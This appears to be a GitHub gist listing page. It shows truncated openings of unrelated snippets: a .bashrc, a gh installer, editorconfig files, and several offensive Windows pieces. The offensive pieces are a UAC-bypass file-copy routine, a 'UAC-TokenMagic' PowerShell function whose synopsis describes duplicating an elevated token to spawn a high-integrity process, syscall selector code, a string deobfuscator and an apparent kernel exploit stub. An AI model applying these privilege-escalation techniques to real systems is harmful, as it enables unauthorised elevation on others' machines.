This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ~/.bashrc: executed by bash(1) for non-login shells. | |
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) | |
# for examples | |
# If not running interactively, don't do anything | |
[ -z "$PS1" ] && return | |
# don't put duplicate lines in the history. See bash(1) for more options | |
# ... or force ignoredups and ignorespace | |
HISTCONTROL=ignoredups:ignorespace |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
PREFIX=${PREFIX:-/usr/local} | |
set -eo pipefail | |
if ! which gh >/dev/null; then | |
echo "gh is not installed. Please install gh and try again." | |
echo "See https://github.com/cli/cli" | |
exit 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[*] | |
charset = utf-8 | |
end_of_line = lf | |
indent_size = 2 | |
indent_style = space | |
insert_final_newline = true | |
trim_trailing_whitespace = true | |
quote_type = single | |
### Frontend files |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Win32 = @" | |
using System; | |
using System.Runtime.InteropServices; | |
public class Win32 { | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
[DllImport("kernel32")] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
def deobfuscate_strings(numbers_string, substract_number): | |
result = '' | |
numbers_list = numbers_string.split('.') | |
for number in numbers_list: | |
result = result + chr(int(number) - int(substract_number)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[*] | |
charset = utf-8 | |
end_of_line = lf | |
indent_size = 2 | |
indent_style = space | |
insert_final_newline = true | |
trim_trailing_whitespace = true | |
quote_type = single | |
### Frontend files |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#define DB(_val_) __asm __emit (_val_) | |
#define INVALID_SYSCALL (DWORD)(-1) | |
// code selectors | |
#define CS_32 0x23 | |
#define CS_64 0x33 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void TestCopy() | |
{ | |
BOOL cond = FALSE; | |
IFileOperation *FileOperation1 = NULL; | |
IShellItem *isrc = NULL, *idst = NULL; | |
BIND_OPTS3 bop; | |
SHELLEXECUTEINFOW shexec; | |
HRESULT r; | |
do { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function UAC-TokenMagic { | |
<# | |
.SYNOPSIS | |
Based on James Forshaw's three part post on UAC, linked below, and possibly a technique | |
used by the CIA! | |
Essentially we duplicate the token of an elevated process, lower it's mandatory | |
integrity level, use it to create a new restricted token, impersonate it and | |
use the Secondary Logon service to spawn a new process with High IL. Like | |
playing hide-and-go-seek with tokens! ;)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, os, mmap, subprocess | |
from struct import pack, unpack | |
from ctypes import * | |
IA32_SYSENTER_ESP = 0x175 | |
IA32_SYSENTER_EIP = 0x176 | |
class PyObj(Structure): | |
_fields_ = [( 'ob_refcnt', c_size_t ), |
NewerOlder